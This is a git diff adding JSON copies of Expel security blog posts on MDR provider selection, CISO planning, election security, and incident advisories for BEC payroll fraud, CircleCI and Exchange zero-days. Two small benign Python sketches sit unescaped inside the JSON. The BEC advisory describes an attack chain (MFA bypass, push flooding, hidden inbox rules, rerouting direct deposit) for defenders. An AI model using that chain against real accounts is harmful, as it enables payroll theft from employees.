its best. You\u2019re invited to test drive our comprehensive MDR, phishing and hunting services to experience the full benefits." +} \ No newline at end of file diff --git a/does-your-mssp-or-mdr-provider-know-how-to-manage.json b/does-your-mssp-or-mdr-provider-know-how-to-manage.json new file mode 100644 index 0000000000000000000000000000000000000000..31341b7e0aacc29f36b21dc1bfe33fd7ec8907f6 --- /dev/null +++ b/does-your-mssp-or-mdr-provider-know-how-to-manage.json @@ -0,0 +1,6 @@ +{ + "title": "Does your MSSP or MDR provider know how to manage ...", + "url": "https://expel.com/blog/does-your-mssp-or-mdr-provider-know-how-to-manage-your-signals/", + "date": "Apr 11, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Does your MSSP or MDR provider know how to manage your signals? Security operations \u00b7 4 MIN READ \u00b7 JAMES JURAN \u00b7 APR 11, 2019 \u00b7 TAGS: How to / Managed security / Selecting tech / Tools We\u2019ve said it before but it\u2019s worth repeating \u2026 when you\u2019re evaluating an MSSP or MDR, you\u2019ve gotta make sure the provider can integrate with the tech you already have and make it work harder for you. (Pro tip: If your MSSP or MDR immediately suggests that you run out and buy a chest of shiny new security tools, they\u2019re probably not the right fit for you .) Here are four questions to ask your prospective provider to find out if they\u2019re up to the challenge of managing your fleet of security signals. Question 1: How do you get data from my existing tech? 
Most security devices or services stream data via syslog or WebSocket. At first glance, this seems like a great way to collect all those disparate security signals \u2014 especially because your provider doesn\u2019t have to write extra code. Before you hit the \u201ceasy\u201d button, dig a little deeper with your provider. Ask some questions like: How hard is it for me as a customer to set that up? How will I know that it\u2019s working or when it breaks (like when my network admin accidentally removes the firewall rule that allowed my data to get to your collector)? What happens when your collector is down? Will the one high-priority alert that indicates attackers are in my network get dropped on the floor and delay discovery of the intrusion? Can I ask the device or service for more information to support an investigation, or can I only receive the information that you chose to put in the streaming protocol? Instead of streaming data, we prefer to poll for alerts. Yes, it takes more work, but it\u2019s much more reliable and it lets us audit our data ingestion processes to make sure we\u2019re not missing anything mission critical (BTW, we\u2019ve got a whole post on setting up a rockin\u2019 data auditing process ). Here are a few reasons why we think polling for data is more effective and reliable: When there\u2019s an interruption for any reason, you and your provider know what data was received and what wasn\u2019t, so you can pick up where you left off. And if something goes wrong (it happens once in a while) your provider can easily \u201cset the clock back\u201d and re-ingest data. You can conduct an audit to double check that you and your provider received the alerts they were supposed to receive. (We\u2019re big fans of checking our work!) It\u2019s super easy for you as the customer to set this up with your provider. For most devices or services, all you have to do is create an API key with the right permissions and the provider handles the rest. There are some security product and service vendors that have more sophisticated protocols than raw syslog and WebSockets that provide these same benefits \u2014 your vendor should gladly support those too. Question 2: What tools do you use to make sure my signals are getting to you? With lots of security signals coming in from different directions, you\u2019ve gotta make sure your provider can verify that they\u2019re receiving the signals from all your tech. In our case, we combine tools like Datadog , PagerDuty , Sentry , Google\u2019s Stackdriver Trace , and Slack to keep a close watch on what\u2019s going on with every device and let the right people know when there\u2019s a problem. Ask your provider what tools they use to monitor device health, how quickly they\u2019ll detect if something isn\u2019t working and how they\u2019ll communicate that to you. Take it one step further and find a way to check your provider\u2019s work. One of our guiding principles here is, \u201cShow me metrics or it didn\u2019t happen.\u201d Intuition and anecdotes are useful but they don\u2019t prove what happened or form the basis for monitoring. For each of our customers, we have an automatically-generated Datadog dashboard for each customer\u2019s security devices. 
This gives us an easy, comprehensive way to look at a device\u2019s performance over time: And because troubleshooting a problem shouldn\u2019t require logging into a production database, we built a Slack bot that quickly gives our device integration engineers the lowdown on what\u2019s happening with each device and makes it easy for them to pivot to other systems for deeper investigation: Ask your provider how they check device health and request a first-hand look at the tools they use to make sure they\u2019re receiving all your signals (then, see if they have a solid process in place in case something goes wrong). Question 3: How do you build integrations with new devices? When your service provider builds an integration with a new security product, do they reinvent the wheel every time (and find new ways to make mistakes)? Or do they have a process to build each integration faster and better than the last one? TL;DR: Your provider needs a framework that handles all the complexities of receiving signal. That framework should handle all the complexities of alert polling, populating metrics and handling errors. This lets the integration developer focus on actions that are specific to the new security product. Question 4: What happens when things break? The old adage is true \u2026 nobody is perfect all the time. But does your provider tell you about problems as they\u2019re happening \u2014 on a public status page for systemic problems or with a personal phone call, email or Slack message when the issue is specific to your tech? And once the problem is fixed, what\u2019s the provider doing to reduce the risk of that same issue happening again? Even with the best reviews, testing and monitoring, problems still happen. When they do, a good provider will \u201c fix the problem two ways .\u201d Solving the immediate problem as quickly as possible to mitigate the impact is the obvious part. The part that takes discipline is coming back and figuring out how to reduce the risk of the problem from ever occurring again, how to catch it sooner when it does and identifying easier ways to diagnose and fix it. How can you get a better understanding of how your provider will act when things don\u2019t go as planned? Ask to see their latest after-action report on something that failed. Or, ask to talk to one of their customers who experienced a problem with the service and then ask that customer how the provider handled it. Diving deeper Want more ideas on what to ask your potential provider? We could give you a whole laundry list of Qs to ask when evaluating an MSSP or MDR (this is one of our favorite topics, in case you couldn\u2019t tell). In fact, we\u2019ve got more of those questions \u2014 lots of \u2018em \u2014 here on our blog. 
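Here is a rough sketch of the "poll and pick up where you left off" pattern from Question 1, in Python. The vendor endpoint, its since parameter, and the response fields are placeholders, because every product's alert API looks a little different.

```python
import json
import time
from pathlib import Path

import requests

CHECKPOINT = Path("last_poll.json")
ALERTS_URL = "https://vendor.example.com/api/v1/alerts"  # placeholder endpoint

def load_checkpoint() -> str:
    # If something goes wrong, "set the clock back" by editing this file
    # and re-ingesting from an earlier timestamp.
    if CHECKPOINT.exists():
        return json.loads(CHECKPOINT.read_text())["since"]
    return "1970-01-01T00:00:00Z"

def save_checkpoint(since: str) -> None:
    CHECKPOINT.write_text(json.dumps({"since": since}))

def poll_once(api_key: str) -> list[dict]:
    resp = requests.get(
        ALERTS_URL,
        headers={"Authorization": f"Bearer {api_key}"},
        params={"since": load_checkpoint()},
        timeout=30,
    )
    resp.raise_for_status()
    alerts = resp.json().get("alerts", [])
    if alerts:
        # Only advance the checkpoint after the batch is handed off, so an
        # interruption never silently drops alerts. Assumes ISO 8601 timestamps.
        save_checkpoint(max(a["created_at"] for a in alerts))
    return alerts

if __name__ == "__main__":
    while True:
        for alert in poll_once(api_key="REPLACE_ME"):
            print(alert["id"], alert["created_at"])
        time.sleep(60)
```

The checkpoint file is what makes the audit and re-ingest story possible: both sides can see exactly where collection left off.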
Check out \u201c 12 revealing questions to ask when evaluating an MSSP or MDR provider \u201d and \u201c 12 ways to tell if your managed security provider won\u2019t suck next year .\u201d" +} \ No newline at end of file diff --git a/don-t-blow-it-5-ways-to-make-the-most-of-the-chance-to.json b/don-t-blow-it-5-ways-to-make-the-most-of-the-chance-to.json new file mode 100644 index 0000000000000000000000000000000000000000..62792c5965ad7205a44645eb61385d75d8645724 --- /dev/null +++ b/don-t-blow-it-5-ways-to-make-the-most-of-the-chance-to.json @@ -0,0 +1,6 @@ +{ + "title": "Don't blow it - 5 ways to make the most of the chance to ...", + "url": "https://expel.com/blog/5-ways-to-make-the-most-of-chance-to-revamp-security-posture/", + "date": "May 28, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Don\u2019t blow it \u2014 5 ways to make the most of the chance to revamp your security posture Security operations \u00b7 4 MIN READ \u00b7 MICHAEL SUTTON \u00b7 MAY 28, 2019 \u00b7 TAGS: CISO / Managed security / Management / Planning Michael Sutton is the founder of StoneMill Ventures, which invests in disruptive cybersecurity companies. Michael has more than 20 years\u2019 experience working in the security space, spending nearly 11 years as the Chief Information Security Officer (CISO) at Zscaler, and holding security-focused roles at companies like Hewlett-Packard, Verisign and Ernst & Young. I occasionally hear from CISOs that a moment in time comes when they suddenly have a blank slate and therefore the opportunity to fundamentally revamp their security posture. This blank slate appears for a variety of reasons: maybe the CISO is new to the company, a breach occurred, the company\u2019s taking on new investment capital, or the company\u2019s preparing to go public. Whatever the driver, this is a golden opportunity for a CISO \u2014 one that shouldn\u2019t be squandered. In fact, I found myself in this situation a few years ago. Here\u2019s what I learned about making the most of this opportunity, along with some guidance as to where to start when you have an empty canvas in front of you. Build a foundation Even though you\u2019ve probably got plenty of opinions on what\u2019s needed to build (or rebuild) a great security program \u2013 and it\u2019s great that the company is now interested in investing in security \u2014 avoid the temptation to dive in head first and start making changes immediately. All good things do come to an end, which is why it\u2019s critical that you first establish a game plan that you\u2019ll continually reference as the basis for any decisions you make going forward. No matter how much flexibility you may have at a given point in time, you\u2019ll always have someone to answer to and you\u2019ll need to show progress against committed milestones. So where do you start? To set yourself and the company up for long-term success, select and build your program around an established cybersecurity framework. Doing so will keep you on track, assist with prioritization and provide a clear roadmap that others can easily follow so they know where you\u2019re headed. There are plenty of cybersecurity frameworks available and you should take some time to identify the one that\u2019ll work best for you. In my experience, the NIST Cybersecurity Framework is now the most widely adopted among U.S. enterprises and is flexible enough to meet the needs of most orgs. Whatever framework you choose, it\u2019s important to first map your existing security controls against the framework. 
You\u2019ll be able to show everyone where deficiencies exist and help with prioritizing resources. This mapping will serve as a baseline that you can measure yourself against \u2013 it\u2019s a great way to show progress as you make security investments. Seek objective opinions As much as we want to think we have all the answers, seeking external and objective viewpoints will help validate your assessments. Consider external pen tests or risk assessments, which you can usually get at a relatively low cost if you negotiate small initial contracts with larger ones to follow once your overall plan is approved. It\u2019s much easier to defend your assessment of the org\u2019s security posture or to seek additional budget if you can point to empirical evidence where weak controls already exposed your org to risk. Make friends Security is a team sport. Even if you\u2019ve secured budget for new resources, collaborating with other teams is essential. For example, selecting a source code scanning tool won\u2019t be valuable if the developers don\u2019t want to use it, or if you selected one that doesn\u2019t fit into their existing workflow. And good luck navigating any security audit without the cooperation of other departments. That\u2019s why you\u2019ve got to build those alliances early and often. Make sure that others in the org view the security team as one that can help them achieve their objectives, not hold them back. Having allies is critical to your success. Position security as a business driver Too many executives view the security team as a cost center and, even worse, the part of the company that slows them down. While you shouldn\u2019t expect to ever be seen as a profit center, you should absolutely position security as a business driver. How exactly can you do that? Work with other teams to understand their needs (when in doubt, re-read the \u201cMake friends\u201d section above) and determine how security can help. For example, has your sales team run into roadblocks with certain deals because of regulatory and compliance issues? That\u2019s an area where you can and should lend a hand. Or have you heard employees complaining about not being able to use a certain tool or service because they\u2019re blocked by security and IT? Don\u2019t ever lower your security posture to appease your colleagues, but in my experience there\u2019s usually a way to meet employees\u2019 needs without negatively impacting your risk profile if you take the time to understand what they\u2019re trying to achieve. All you need to do is sit down with them and take the time to listen. Ask for regular feedback Security is never done. That\u2019s why it\u2019s critical to revisit your initial mapping and make sure the gaps you identified at the beginning of the process are closing and that investments are paying off. Over time, you\u2019ll probably need to create additional metrics to show your progress. These metrics will differ depending on your goals, but it\u2019ll help you communicate to and get support from your executive team and the board. Every enterprise has a moment of clarity when it comes to security. Whether that arrives via the installation of a new security-conscious CEO or from landing on the front page of The New York Times thanks to a high-profile breach, make sure you\u2019ve got a game plan for moving forward. Step up to the plate, follow these tips, and you\u2019ll be sure to knock it out of the park." 
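One lightweight way to keep that baseline honest is to track the control-to-framework mapping as data you can re-score each quarter. A toy sketch follows; the control names and maturity scores are made up for illustration, and only the five function names come from the NIST CSF itself.

```python
# Toy baseline: map existing controls to NIST CSF functions and score coverage.
CSF_FUNCTIONS = ["Identify", "Protect", "Detect", "Respond", "Recover"]

# Illustrative controls with a rough 0-3 maturity score for each.
controls = {
    "Asset inventory":        {"function": "Identify", "maturity": 1},
    "MFA everywhere":         {"function": "Protect",  "maturity": 2},
    "EDR on endpoints":       {"function": "Detect",   "maturity": 2},
    "Incident response plan": {"function": "Respond",  "maturity": 0},
    "Tested backups":         {"function": "Recover",  "maturity": 1},
}

def baseline(controls: dict) -> dict:
    """Average maturity per CSF function; re-run each quarter to show progress."""
    scores = {fn: [] for fn in CSF_FUNCTIONS}
    for ctl in controls.values():
        scores[ctl["function"]].append(ctl["maturity"])
    return {fn: (sum(v) / len(v) if v else 0.0) for fn, v in scores.items()}

for fn, score in baseline(controls).items():
    flag = "  <-- gap" if score < 1 else ""
    print(f"{fn:<10} {score:.1f}{flag}")
```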
+} \ No newline at end of file diff --git a/don-t-dam-upstream-ways-to-build-a-feedback-loop.json b/don-t-dam-upstream-ways-to-build-a-feedback-loop.json new file mode 100644 index 0000000000000000000000000000000000000000..ecff2a0b7e5da942ecba7ed5bfb624c9c42bf11e --- /dev/null +++ b/don-t-dam-upstream-ways-to-build-a-feedback-loop.json @@ -0,0 +1,6 @@ +{ + "title": "Don't dam upstream: ways to build a feedback loop", + "url": "https://expel.com/blog/dont-dam-upstream-ways-build-feedback-loop/", + "date": "Sep 14, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Don\u2019t dam upstream: ways to build a feedback loop Talent \u00b7 2 MIN READ \u00b7 YANEK KORFF \u00b7 SEP 14, 2017 \u00b7 TAGS: Employee retention / Great place to work / Management I was interviewing a candidate for a security analyst role and asked one of my two favorite questions: \u201cTalk to me about a time\u2026 or a project\u2026 where, looking back on it you think to yourself: if I never have to do that again, it\u2019ll be too soon. What was that misery, and what made it miserable?\u201d The candidate had a strong technical background and his experience was right on the mark. He also had an exceptionally relevant response. He described working at a federal SOC. Overall, it was a great learning experience, he said. They were constantly finding bad stuff and he learned a lot from his peers, but neither he nor his co-workers had any ability to influence detection. A separate team handled that. And \u2014 for security reasons \u2014 neither team could talk to the other. Hah! So, every week he\u2019d see the same false positives he\u2019d flagged the week before\u2026 and the week before that. Over time, this bred a feeling of helplessness, boredom and eventually burnout. His story reminded me of an article I\u2019d read in the Harvard Business Review years ago by the CEO of Johnsonville Sausage. He was struggling with performance problems and described his employees as \u201cso bored by their jobs that they made thoughtless, dumb mistakes. They showed up in the morning, halfheartedly did what they were told, and then went home.\u201d Sounds terrible (side note: the thought of quality problems in sausage makes me a bit queasy).In any case, it took years, but that CEO finally came to an important realization: \u201cThose who implement a decision and live with its consequences are the best people to make it.\u201d The result? They changed their quality control system. Turns out, this practice applies directly to security operations and probably a lot of other disciplines as well. The people who live with the consequences of detection must be integral to deciding how intelligence and methodologies are applied in the first place. Without this feedback loop, you\u2019re stuck with bad sausage. Back to the interview. We were hiring for a role where the candidate would be in the exact same position he\u2019d just said he never wanted to repeat. At the time, the feedback loop in our SOC was broken and the required fixes weren\u2019t trivial. Even though he was an exceptionally well qualified candidate, we chose not to proceed because he\u2019d have been miserable.These disconnects aren\u2019t unusual. \u201cJust add a feedback loop\u201d is too simplistic an answer. Solving this problem in security operations is much harder. Many analysts in a SOC lack the experience to effectively drive detection. 
Those who do have the experience typically don\u2019t work in the SOC (or at least, not on shift) and may have forgotten exactly how frustrating this situation can be. Still, it\u2019s not hopeless. If you find yourself in this situation, here are four options to build in a feedback loop. 1. Align incentives If the SOC and detection/intel team report into different managers, make it clear to your detection team\u2019s manager that her success is measured by the SOC manager\u2019s enthusiastic support. 2. Get physical Is your SOC sectioned off from the rest of your security team? Reserve seats for your sister team\u2019s personnel. If there aren\u2019t enough seats, rotate people through. 3. Make the pain transparent By measuring the time wasted chasing dead ends (or even the volume of dead ends) and tying those to root causes, you\u2019ll make it clear when adjustments are needed upstream. 4. Celebrate improvement As you use metrics to drive change in your detection methodologies, reward your teams when the needle meaningfully moves in the right direction. Common wins help unify teams. \u2014 This is the second part of a five part series on key areas of focus to improve security team retention. Read the introduction, 5 ways to keep your security nerds happy , or continue to part three ." +} \ No newline at end of file diff --git a/election-security-why-to-care-and-what-to-do-about-it.json b/election-security-why-to-care-and-what-to-do-about-it.json new file mode 100644 index 0000000000000000000000000000000000000000..547e5ee9aa646e09116c771f30901f4aa7b8c5ff --- /dev/null +++ b/election-security-why-to-care-and-what-to-do-about-it.json @@ -0,0 +1,6 @@ +{ + "title": "Election security: Why to care and what to do about it", + "url": "https://expel.com/blog/election-security-why-care-what-to-do/", + "date": "Apr 7, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Election security: Why to care and what to do about it Security operations \u00b7 3 MIN READ \u00b7 BRUCE POTTER \u00b7 APR 7, 2020 \u00b7 TAGS: Framework / Guide / NIST / Planning If someone asked you to think about elections, what\u2019s the first thing that comes to mind? For most people, it\u2019s that moment when you show up at your polling place and cast your ballot. But the reality is that the system is so much larger than that \u2014 elections are about far more than the voting machine and election security is about more than securing a single piece of equipment. Consider voter registration efforts and election rolls, all of the information voters have digested leading up to voting day that have influenced their decisions \u2026 And don\u2019t forget what happens after you cast your vote and how the results are tallied. Now combine all those moments in the election security supply chain with a global health crisis \u2014 think sending absentee ballots to everyone in a given state so they can vote in the primary \u2014 and you\u2019ve got even more potential election-related vulnerabilities on your hands. To understand and mitigate election security, it\u2019s essential to consider the entire supply chain. The parts of our election security \u201csupply chain\u201d There are six distinct parts of the election supply chain (see below) and they all have the potential to be compromised at different times (and in different ways) during the election cycle. The TL;DR? The potential for election compromise starts long before Election Day. Which is exactly why we created a handbook about the election security supply chain. 
We know there are other election security guides out there \u2014 but most of them focus only on a single part of the election process, like voting infrastructure. In our latest guide , we zoom in on each step along the election supply chain and look at potential points of compromise including how a crafty attacker could \u201chack\u201d each piece along the chain. For each part of the election supply chain we also offer up ideas about how public and private sector organizations\u2014even individual, well-informed citizens who are planning to vote\u2014can better protect our elections from attacks. Why it matters Whether you work in security, are an election official or just happened to be, well, an informed voter, there are plenty of ways we can all band together to collectively improve the security posture of our elections systems. And no matter your role in the process, maintaining or improving the integrity of our democracy is in everybody\u2019s best interest. What we (yes, you) can do about it By focusing on even a few key proactive security measures, our election security supply chain would be far better protected than it is today. Here are just a few ideas on how we can work together to improve election security: Educate yourself (and others). Whether you\u2019re making sure your election officials know how to transfer election results to a website (ahem, Iowa) or sending your security analysts to relevant training sessions or conferences, educating the people who impact each part of the election supply chain is paramount. And if you\u2019re a regular ol\u2019 voter? Fact check what you read about candidates and issues, and get your information from multiple, varied sources. Learn about (and implement) security best practices and frameworks. If you\u2019ve worked in security for any length of time, chances are good that you\u2019ve heard of the NIST Cyber Security Framework (CSF) . The NIST CSF is one of the many frameworks out there that can help you gauge your effectiveness when it comes to security and think about how you want your efforts to change or grow. So whether it\u2019s NIST or something else, pick a framework and use it to understand where and how you can get better. Pressure test your systems. You know what helps when bad things start happening? Having a plan and knowing who needs to do what when something goes sideways. Create an incident response plan \u2014better yet, create a plan, emulate an incident and practice what you might do if that bad thing happened in real life. Grab your copy of our election security handbook Want to read more? Click the button below to download your copy of our election security handbook right now. 
Download the election security handbook" +} \ No newline at end of file diff --git a/emerging-threat-bec-payroll-fraud-advisory.json b/emerging-threat-bec-payroll-fraud-advisory.json new file mode 100644 index 0000000000000000000000000000000000000000..4ea56ae2bfadda9e8e5ab685952705627b386be1 --- /dev/null +++ b/emerging-threat-bec-payroll-fraud-advisory.json @@ -0,0 +1,6 @@ +{ + "title": "Emerging Threat: BEC Payroll Fraud Advisory", + "url": "https://expel.com/blog/emerging-threat-bec-payroll-fraud-advisory/", + "date": "Jul 27, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Emerging Threat: BEC Payroll Fraud Advisory Security operations \u00b7 2 MIN READ \u00b7 JONATHAN HENCINSKI, JENNIFER MAYNARD, RAY PUGH, KYLE PELLETT, ANDREW BENTLE, DAVID BLANTON, DESHAWN LUU AND BEN BRIGIDA \u00b7 JUL 27, 2022 \u00b7 TAGS: MDR In July 2022, our security operations center (SOC) observed Business Email Compromise (BEC) attacks across multiple customer environments, targeting access to human capital management systems\u2014specifically, Workday. The goal of these attacks? Payroll and direct deposit fraud. In this post, we\u2019ll share the attack chain we\u2019ve seen across multiple environments and high-level tips for spotting this class of fraud. How they get in An attacker begins by compromising a user\u2019s Microsoft Office 365 (O365) or Okta account, often using BasicAuthentication (BAV2ROPC, IMAP, POP3) to bypass multi-factor authentication (MFA)\u2014usually occurring from VPN and hosting IPs. From there, attackers can access the victim\u2019s Workday account directly through Okta, the compromised password, or a password reset email. In scenarios where the attacker compromises an O365 account and doesn\u2019t have direct access to Workday via single sign on (SSO), an attacker will read available documentation on payroll systems and new employee payroll enrollment. The goal, in most cases, is to identify how to gain access to human capital management systems using new employee setup procedures, or password reset requests. (Side note: we\u2019ve also seen cases where attackers don\u2019t use BasicAuthentication, and the compromised user authorizes an MFA notification for the attacker using brute force Duo push requests. This involves an attacker continuously sending Duo push notifications to the victim until they accept.) Attackers can then create inbox rules within the compromised user\u2019s email account to delete or move emails related to workday.com, myworkday.com, and/or emails with keywords (like \u201cpayroll\u201d or \u201cassistance needed\u201d). To prolong this access, attackers can enroll trusted devices through an organization\u2019s mobile or endpoint device management platform (for example, Microsoft InTune). Now, the attacker can modify the compromised user\u2019s settings to add the attacker\u2019s direct deposit information\u2014depositing the victim\u2019s paycheck into the attacker\u2019s account. How to spot it So what can you do to detect\u2014and hopefully prevent\u2014these costly attacks? Here\u2019s what we recommend: For security teams: Alert for new Outlook Inbox-rules created with suspicious names (two to three characters in length, or repeating characters could be a clue). 
Also watch out for certain keywords, like \u201cpayroll\u201d and \u201cWorkday\u201d Alert for multiple Okta sessions from the same user with multiple, non-mobile operating systems Alert for potential brute force Duo push requests Review any authentication using legacy protocol (UA = Bav2ropc) into O365 as it may represent MFA bypass. (P.S. Have you disabled legacy protocols yet?) For employees (if you notice your paychecks aren\u2019t correct): First, log into your payroll platform and check your paycheck. Check that the amounts are correct and are distributed to your legitimate bank accounts. Check the rules for your Outlook Inbox for any abnormal or suspicious rules you didn\u2019t set up. Click \u201cFile\u201d and then \u201cRules & Alerts\u201d to review the rules you\u2019ve implemented. If anything is incorrect, alert your security team immediately . If you get locked out of your account for an unknown reason, check your deposit information immediately when you regain access. For businesses, the impact of this likely varies based on size. A large business may have more of a safety net when it comes to resources to compensate employees that have been compromised. A smaller operation might suffer more if it boils down to lack of funds\u2014not to mention, the loss of the employee who was victimized in the first place. Our most recent quarterly threat report revealed 57% of all incidents our SOC observed were BEC attempts in O365\u2014with 24% of our customers experiencing at least one BEC attempt in O365. We\u2019re sharing this information to raise awareness on this class of fraud, help defenders spot it in the wild, and as a reminder that effective security operations is so much more than just protecting the endpoint." +} \ No newline at end of file diff --git a/emerging-threat-circleci-security-incident.json b/emerging-threat-circleci-security-incident.json new file mode 100644 index 0000000000000000000000000000000000000000..8ad6bca313a8ce9a7883842e766125750a434443 --- /dev/null +++ b/emerging-threat-circleci-security-incident.json @@ -0,0 +1,6 @@ +{ + "title": "Emerging Threat: CircleCI Security Incident", + "url": "https://expel.com/blog/emerging-threat-circleci-security-incident/", + "date": "Jan 5, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Emerging Threat: CircleCI Security Incident Security operations \u00b7 3 MIN READ \u00b7 JAMES JURAN AND SAM BROWN \u00b7 JAN 5, 2023 \u00b7 TAGS: MDR What happened? Expel is aware of CircleCI\u2019s reported security incident and their recommendation to rotate all credentials stored in their system. Expel uses CircleCI, so we\u2019re closely monitoring this situation for updates and we\u2019re taking action ourselves. Why does it matter? CircleCI is a CI/CD (continuous integration and continuous delivery) platform used by more than a million engineers, Expel included. CI/CD systems often contain many powerful credentials, as they are a key part of the pipeline to ship software. At this time, there is no evidence that any of Expel\u2019s credentials have been improperly used. But, based on CircleCI\u2019s announcement, we\u2019re acting out of an abundance of caution. What\u2019re we doing? The good news: we anticipated these risks and tabletopped this situation starting all the way back in 2018. As a result of our tabletop exercises and risk analyses, we already have automated daily rotation in place for our highest-risk credentials. 
This means that if those credentials were exfiltrated, attackers would only have 24 hours to use them before they became useless. Additionally, Expel has detection systems within our environment to trigger on use of exposed credentials. In response to this specific incident, we\u2019ve inventoried all credentials stored in CircleCI. We\u2019re rotating them as quickly as possible, and are reviewing logs of the use of those credentials for anomalous activity. What should you do right now? First: figure out if you use CircleCI in your organization. If you already work closely with your engineering team(s), you probably already know what they use for CI/CD. But, if software development is distributed throughout your organization and you don\u2019t have perfect visibility into their tooling, it may take some investigation. Pro tip: If you have a friend on your finance team, ask them if they pay a vendor named CircleCI or Circle Internet Services\u2014that might be faster than tracking down a bunch of engineering teams. If you know you use CircleCI, it\u2019s time to take action right away. First, eliminate the potential risk in your environment by rotating every credential stored in CircleCI. CircleCI has provided guidance about all the places secrets can be stored in CircleCI. For each one, go to the source of the credential, and rotate it. Exactly how you do this will depend on what it is. For example, if it\u2019s a user account in a ticketing system, change the password for that user account. If it\u2019s an API key or SSH key, disable or delete it, and make a new one. Replace the old credential in CircleCI with the new one. If you have a lot of credentials, this will take a while. You\u2019ll probably want to compile a list and split it up among multiple people. You may want to get buy-in from engineering leadership to have engineers help with this, and accept the fact this might cause some interruptions in your engineering team\u2019s work. We think that\u2019s a good tradeoff to make to protect your organization\u2019s security in this situation, based on the information available from CircleCI at this time. Once you\u2019ve rotated all your credentials, you\u2019ve achieved the first goal: eliminating the risk to your environment if your credentials were exposed. But, you also want to know if your credentials were actually used improperly. This is going to require reviewing the logs of usage of all those credentials. This is probably going to be time-consuming. You might even discover some gaps in your auditing; make notes of these to consider improving in the future. At the end of this exercise, you\u2019ll know where you stand. Hopefully you can breathe a sigh of relief that you dodged a bullet. If you uncover suspicious activity, that\u2019s your cue to begin your incident response process. What can you do longer term? CI/CD systems are a big target for attackers, because they have a lot of powerful credentials. If you want to reduce your risk from this sort of threat, two things we\u2019ve done that we recommend you consider doing are: Implement short-lived credential access and rotation workflow. We use Hashicorp Vault for this. See our blog post on using Hashicorp Vault to manage database credentials for more awesome things you can do with Hashicorp Vault to reduce your risk from long-lived credentials. Get a \u201ccanary\u201d tool and use it. 
Create some credentials that aren\u2019t actually used for anything and put them in any place (like your CI/CD tool) that stores credentials. Don\u2019t make it obvious that they are canary credentials, of course! Your canary tool will monitor if they are used and alert you. What next? Like we said, we\u2019re monitoring this situation closely. Keep an eye out here and on our socials ( @ExpelSecurity ) for any additional recommendations as we learn more." +} \ No newline at end of file diff --git a/emerging-threats-microsoft-exchange-on-prem-zero-days.json b/emerging-threats-microsoft-exchange-on-prem-zero-days.json new file mode 100644 index 0000000000000000000000000000000000000000..971ffd7ef295e626750a9d4e0673bfe25e8aa735 --- /dev/null +++ b/emerging-threats-microsoft-exchange-on-prem-zero-days.json @@ -0,0 +1,6 @@ +{ + "title": "Emerging Threats: Microsoft Exchange On-Prem Zero-Days", + "url": "https://expel.com/blog/emerging-threats-microsoft-exchange-on-prem-zero-days/", + "date": "Sep 30, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Emerging Threats: Microsoft Exchange On-Prem Zero-Days Security operations \u00b7 2 MIN READ \u00b7 JONATHAN HENCINSKI \u00b7 SEP 30, 2022 \u00b7 TAGS: MDR This week, Microsoft confirmed two new Exchange zero-day vulnerabilities used in attacks . Right now, there isn\u2019t a patch available for the two unique CVEs affecting Microsoft Exchange On-Premises (note that Microsoft Exchange Online customers aren\u2019t impacted): CVE-2022-41040: Server-side Request Forgery (SSRF) vulnerability. This is when an attacker tricks the server into performing actions on their behalf. CVE-2022-41082: Allows remote code execution (RCE) when PowerShell is accessible to the attacker. This can be used to gain access to the server running Microsoft Exchange. What happened? GTSC , a Vietnamese Cybersecurity coalition, reported on September 29, 2022 that it had identified the exploitation of two previously undisclosed vulnerabilities on a fully patched Exchange Server. First observed in early August of this year, the vulnerabilities were originally reported to Microsoft and the Zero Day Initiative (ZDI) that same month. However, a patch hasn\u2019t yet been released. Microsoft did acknowledge the vulnerabilities today, September 30, 2022, and assigned them CVE designations. According to Microsoft, the observed vulnerabilities have been used together in attacks against Exchange Servers, with the successful exploitation of the SSRF vulnerability allowing for the possibility of the RCE vulnerability. Both vulnerabilities require authenticated access to the target Exchange Server. What should you do? While waiting for Microsoft to issue a patch, security teams can take a few actions to mitigate risk for their organizations. We recommend: First, for any on-prem customers, teams should immediately take the steps outlined by Microsoft to block exposed Remote PowerShell ports. Next, review your Exchange configuration to determine if Outlook Web App (OWA) is exposed to the internet. If the answer is \u201cyes,\u201d then determine if it\u2019s necessary for any current business needs and evaluate the risk accordingly. (Pro tip: services like Shodan and Censys can help determine what services are publicly accessible.) If you\u2019ve had a Hybrid deployment as part of migration efforts, consider performing an additional asset inventory check to ensure on-prem Exchange servers were taken offline post-migration as appropriate. 
Finally, continue to monitor for additional updates from Microsoft for any new mitigation measures as the situation develops. At Expel, we\u2019re also reviewing all alerts for the past 30 days for known indicators of compromise (IOCs), reviewing alert activity for organizations running on-prem Microsoft Exchange Server, and validating detections for potential web shell delivery and activity. What does it mean for next time? When responding to zero-days, keep in mind that it\u2019s not necessarily about the patch\u2014because there isn\u2019t one. You can try and detect them, but your time is likely better spent building and detecting workflows to alert when something isn\u2019t right. Your best bet for detecting an issue before it\u2019s known publicly? Build, deploy, and continuously improve alerting for behavioral patterns that suggest something\u2019s amiss. (More on this in our annual cybersecurity trends report, Great eXpeltations 2022 .) In this specific Microsoft scenario, it\u2019s important to have endpoint visibility into on-prem Microsoft Exchange Servers, and the ability to detect suspicious Exchange and IIS Worker processes. We\u2019re continuing to monitor this evolving situation, and will keep our customers updated as new information emerges." +} \ No newline at end of file diff --git a/evaluating-greynoise-what-you-need-to-know-and-how-it.json b/evaluating-greynoise-what-you-need-to-know-and-how-it.json new file mode 100644 index 0000000000000000000000000000000000000000..e165245cb2e4ca7a0906ea250d69ee6caef93102 --- /dev/null +++ b/evaluating-greynoise-what-you-need-to-know-and-how-it.json @@ -0,0 +1,6 @@ +{ + "title": "Evaluating GreyNoise: what you need to know and how it ...", + "url": "https://expel.com/blog/evaluating-greynoise/", + "date": "Feb 26, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Evaluating GreyNoise: what you need to know and how it can help you Tips \u00b7 6 MIN READ \u00b7 DAN WHALEN AND PETER SILBERMAN \u00b7 FEB 26, 2019 \u00b7 TAGS: Get technical / How to / Selecting tech / SOC / Tools Editor\u2019s note: This is the first in a series of posts that\u2019ll tell you all about technologies we use in conjunction with Expel Workbench. At Expel, our SOC analysts get to work with lots of cool security technologies every day. Some are integrated directly into Expel Workbench \u2014 like Carbon Black , Darktrace and Duo , to name a 